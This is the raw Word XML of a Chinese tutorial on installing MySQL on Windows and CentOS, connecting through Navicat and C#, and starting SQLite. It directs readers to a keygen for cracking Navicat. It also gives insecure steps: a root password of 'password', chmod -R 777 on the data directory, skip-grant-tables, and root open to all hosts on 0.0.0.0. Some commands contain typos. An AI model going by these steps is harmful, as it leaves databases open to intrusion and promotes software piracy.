          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL在Windows平台的安装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="357" w:hanging="357"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里有两个版本，一个是在线安装包，一个是离线安装包，这里我们选大的，安装过程全部点下一步就好。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>6382385</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6637655" cy="3240405"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6637655" cy="3240405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安装完成后，我们进入doc，输入mysql </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">u root </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p 然后输入密码，这时会提示“2059 - authentication plugin 'caching_sha2_password' -navicat连接异常”。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>这个错误出现的原因是在mysql8之前的版本中加密规则为mysql_native_password，而在mysql8以后的加密规则为caching_sha2_password。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决办法是，将mysql的加密规则改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>mysql_native_password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。我们进入mysql输入：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>use mysql;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>注意：这里我们将密码改成了password，也就是说之前如果设置了root用户的密码就失效了！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来我们来安装Navicat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先我们下载</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://download.csdn.net/download/zhuimengmayi/10245320" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>Navicat Premium_11.2.7简体中文版</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，安装完成后再下载注册机，可以参考这篇教程：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/qq_35660351/article/details/79062720" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>Navicat11 激活（注册机）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>注意：注册机的产品要选择“Navicat Premium Enterprise v11”，否则会注册不上去。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>51435</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>2768600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2936240" cy="2735580"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2936240" cy="2735580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w: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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着我们再打开VS，我的版本是2017，新建一个控制台项目，安装Nuget包Mysql.Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3184525" cy="2892425"/>
            <wp:effectExtent l="19050" t="0" r="0"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noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3185007" cy="2892765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后在网上搜索C# MySQL帮助类，下一个帮助类，填写正确的连接字符串就能用C#调用MySQL了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504"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noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6637655" cy="3905885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL在Linux平台的安装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先在MySQL官网上下载yum资源包：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://dev.mysql.com/downloads/repo/yum/" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>https://dev.mysql.com/downloads/repo/yum/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装MySQL的版本为8.0.13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6645910" cy="2491105"/>
            <wp:effectExtent l="19050" t="0" r="254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noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2491684"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于我的系统是Linux7 Centos，所以选择第一个下载，下载完之后复制</w:t>
      </w:r>
      <w:r>
        <w:t>mysql80-community-release-el7-1.noarch.rpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件到Linux文件夹中，在这个文件夹中打开终端，依次输入：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>rpm -ivh mysql-community-release-el7-5.noarch.rpm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>yum update</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>yum install mysql-server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后稍等一会安装mysql，这是时间会有点长大概一个多小时把。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化MySQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ysqld </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>initizlize</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启动MySQL    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ystemctl start mysqld</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重启MySQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Systemctl restart mysqld</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Systemctl status mysqld</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这时有可能会报错，在var/log/mysqld.log文件中发现错误信息“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>[ERROR] [MY-012271] [InnoDB] The innodb_system data file 'ibdata1' must be writable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">”，这是由于这个文件的权限不够导致的，找到ibdata1这个文件的目录“/var/lib/mysql/”给予其root权限“chmod </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R 777 /var/lib/mysql/”就可以了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下一个问题就是如何重置密码了，以及让外部网络访问了，首先将以下内容复制到“/etc/my.cnf”文件里。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#跳过密码验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>#skip-grant-tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#允许远程访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>bind-address = 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#设置加密格式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>default_authentication_plugin=mysql_native_password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先把</w:t>
      </w:r>
      <w:r>
        <w:t>skip-grant-tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放开注释登陆进去，然后在mysql数据库下执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY '你的密码';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里的root和localhost对应user表的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我这里的host是%所以localhost改成%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2116455" cy="1148080"/>
            <wp:effectExtent l="19050" t="0" r="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noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2117123" cy="1148612"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改成功后，执行</w:t>
      </w:r>
      <w:r>
        <w:t>FLUSH PRIVILEGES;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>刷新权限</w:t>
      </w:r>
      <w:r>
        <w:t>，再把skip-grant-tables注释掉，并重启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。就能用另一台机器的Navicat连接了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sqlite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows环境下快速用C#来操作s</w:t>
      </w:r>
      <w:r>
        <w:t>qlite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Sqlite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为一种轻量级的嵌入式数据，常常在C</w:t>
      </w:r>
      <w:r>
        <w:t>/S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目中扮演重要的角色，而且它具有免费，跨平台，占用空间小等特点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面就来说说C#如何快速地搭建Sqlite的环境吧，首先我的电脑是W</w:t>
      </w:r>
      <w:r>
        <w:t>in10</w:t>
